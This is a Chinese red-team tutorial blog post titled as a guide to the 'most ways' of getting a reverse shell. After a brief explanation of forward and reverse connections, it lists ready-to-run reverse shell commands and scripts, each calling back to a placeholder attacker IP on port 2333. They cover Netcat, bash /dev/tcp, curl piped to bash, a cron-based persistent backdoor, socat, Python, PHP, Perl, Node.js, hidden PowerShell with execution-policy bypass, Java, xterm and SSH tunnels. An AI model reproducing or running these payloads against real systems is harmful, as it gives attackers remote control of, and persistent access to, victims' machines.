红队老子养成记3 - 学会反弹shell的多种姿势,拿shell拿手软!!(全网最多姿势!)
大家好,我是Dest1ny!
今天还是讲redteam里比较重要的反弹shell!
不会反弹shell,那你如何拿控制权限!
今天满满干货,大家加油学!
CLASS-1 正向连接与反向连接详解
1. 正向连接
正向连接是最常见的连接方式。当我们攻击了一台机器后,打开了该机器的一个端口,攻击者在自己的机器上主动连接目标机器的IP和端口。这类连接方式常见于远程桌面、Web服务、SSH、Telnet等。
理解:正向连接适用于目标机器能够被攻击者直接访问和请求的场景。前提是目标机器的端口是开放且可访问的。
人话:攻击者 ->被攻击方
2. 反向连接
为什么需要反弹Shell?
反向连接通常在以下几种情况下使用:
- 目标机器受到防火墙限制,只能发送请求,不能接收请求。
- 目标机的相关端口被占用。
- 目标机位于局域网中,或者其IP会动态变化,攻击者无法直接连接。
- 对于病毒和木马,受害者的上网环境、开关机时间都是未知的。
在这些情况下,正向连接行不通,因此我们使用反向连接。
理解:反向连接即攻击者设定一个服务端,受害者的主机主动发起连接。此方式有效绕过防火墙、端口限制以及内网环境等限制。
反向连接方式详解
反向连接的方式有很多,需要根据目标主机的实际环境选择合适的方法。下面列举几种常见的方法:
3. 利用Netcat反弹Shell
这里全部前提就是自己有一台公网服务器,想要用临时服务器的,去看我这篇文章!
云服务器如何不租月使用,全网最详细(小白必看教程!千字讲解!!)_云服务器如何租-CSDN博客
Netcat是一款简单且强大的网络工具,支持TCP和UDP协议。它可以用来建立各种网络连接,也常用于反弹Shell。以下是安装并使用带有-e参数的Netcat来反弹Shell的步骤:
# 安装Netcat
wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz
tar -xvzf netcat-0.7.1.tar.gz
./configure
make && make install
make clean# 攻击机开启监听
nc -lvvp 2333# 目标机发起连接
nc <攻击机IP> 2333 -e /bin/bash
理解:Netcat的
-e参数在默认安装版本中被移除,因此我们需要手动安装旧版本来实现Shell反弹功能。
4. 利用Bash反弹Shell
使用Bash可以通过重定向的方法实现反弹Shell,具体命令如下:
bash -i >& /dev/tcp/<攻击机IP>/2333 0>&1
理解:该命令创建了一个Bash交互环境,并将输入输出重定向到攻击者的端口上。此方法需要目标机支持Bash环境。
5. 利用Curl和Bash反弹Shell
借助Curl和Bash的组合,也可以实现Shell反弹:
# 攻击者在VPS上准备好payload并监听端口
curl <攻击机IP> | bash
理解:这种方式灵活性高,可用于CTF场景,特别是当目标主机能执行Curl命令时,非常方便快捷。
6. 将反弹Shell写入定时任务或配置文件
可以通过修改定时任务文件(如/var/spool/cron)或者系统的配置文件(如/etc/profile)来持久化反弹Shell的脚本。
# 在定时任务中写入
*/1 * * * * /bin/bash -i>&/dev/tcp/<攻击机IP>/2333 0>&1
理解:这种方式适合在目标主机上植入持久性后门,通过定时任务或配置文件在特定时间段发起连接。
7. 使用Socat反弹Shell
Socat是一款功能强大的网络工具,类似于Netcat,但功能更丰富。以下是其反弹Shell的用法:
# 攻击机监听
socat TCP-LISTEN:2333 -# 目标机连接
socat tcp-connect:<攻击机IP>:2333 exec:'bash -li',pty,stderr,setsid,sigint,sane
理解:Socat的灵活性更强,支持的参数和场景也更丰富,适合需要多样化反弹方法的场景。
8. 使用其他脚本语言反弹Shell
- Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<攻击机IP>",2333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- PHP:
php -r '$sock=fsockopen("<攻击机IP>",2333);exec("/bin/sh -i <&3 >&3 2>&3");'
理解:不同的脚本语言都有相应的反弹Shell方法,这些方法需要目标机器支持相应的运行环境。
9. 使用Metasploit生成反弹Shell
Metasploit框架中的msfvenom工具可以自动生成反弹Shell的脚本:
msfvenom -p cmd/unix/reverse_python LHOST=<攻击机IP> LPORT=2333 -f raw
理解:Metasploit提供了多种反弹Shell的Payload生成方式,非常适合在渗透测试过程中快速使用。
10. 利用Perl反弹Shell
Perl可以通过创建一个Socket来实现反弹Shell的功能,以下是具体命令:
perl -e 'use Socket;$i="<攻击机IP>";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
理解:Perl是一种常见的脚本语言,尤其是在老旧的Linux系统中比较常见。利用Perl可以实现Socket连接,并通过Shell与攻击者进行交互。
11. 利用PHP反弹Shell(GET方式)
如果目标机上有一个支持PHP的Web服务器,可以上传并执行一个简单的PHP脚本:
<?php
$sock=fsockopen("<攻击机IP>",2333);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
理解:这是利用PHP脚本来反弹Shell的基本方式,通常适用于Web环境渗透。它依赖于目标服务器上PHP的执行权限。
12. 利用Node.js反弹Shell
如果目标机支持Node.js环境,可以使用以下代码来反弹Shell:
(function(){var net = require("net"),cp = require("child_process"),sh = cp.spawn("/bin/sh", []);var client = new net.Socket();client.connect(2333, "<攻击机IP>", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;
})();
理解:Node.js环境反弹Shell的方法适用于具备Node.js的服务器或环境,通常在Web服务器或一些应用平台中有效。
13. 利用PowerShell反弹Shell(Windows)
在Windows环境下,可以通过PowerShell来实现反弹Shell:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<攻击机IP>",2333);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}
理解:PowerShell是Windows自带的强大脚本工具,它可以直接在Windows环境下创建反向TCP连接,这种方式非常隐蔽且灵活。
14. 利用Java反弹Shell
Java应用程序也可以利用Java的网络库来反弹Shell:
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;public class ReverseShell {public static void main(String[] args) {String host = "<攻击机IP>";int port = 2333;String cmd = "/bin/sh";try {Socket s = new Socket(host, port);Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();OutputStream po = p.getOutputStream(), so = s.getOutputStream();while (!s.isClosed()) {while (pi.available() > 0) so.write(pi.read());while (pe.available() > 0) so.write(pe.read());while (si.available() > 0) po.write(si.read());so.flush();po.flush();Thread.sleep(50);try { p.exitValue(); break; } catch (Exception e) {}}p.destroy();s.close();} catch (Exception e) {}}
}
理解:Java反弹Shell适合于目标机支持Java环境的场景。代码通过Socket和ProcessBuilder实现了一个反向连接并执行Shell命令的功能。
15. 使用XTerm反弹Shell(图形界面)
XTerm是Unix系统中的终端仿真器。可以通过它来反弹一个Shell到攻击者的X服务器上:
xterm -display <攻击机IP>:1
理解:这种方法需要目标机安装并配置了X11,且攻击者的X服务器处于监听状态。通常适合内网或具有一定权限的场景。
16. 使用SSH反向隧道
SSH反向隧道也是一种常见的反弹Shell方法。前提是目标机器上允许使用SSH并且有SSH权限:
ssh -R 2333:localhost:22 user@<攻击机IP>
理解:SSH反向隧道可以在攻击者机器上打开一个端口,使得目标机的本地端口暴露出来,非常适合于需要长期控制或存在防火墙限制的环境。
17. 使用Python模块反弹Shell(无依赖版)
利用Python的socket模块创建一个轻量级的反弹Shell:
import socket, subprocess, oss = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<攻击机IP>", 2333))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh", "-i"])
理解:这是Python最基础的反弹Shell方法,不依赖于其他库或模块,适合目标机器上没有高级Python模块但具备基础环境的情况。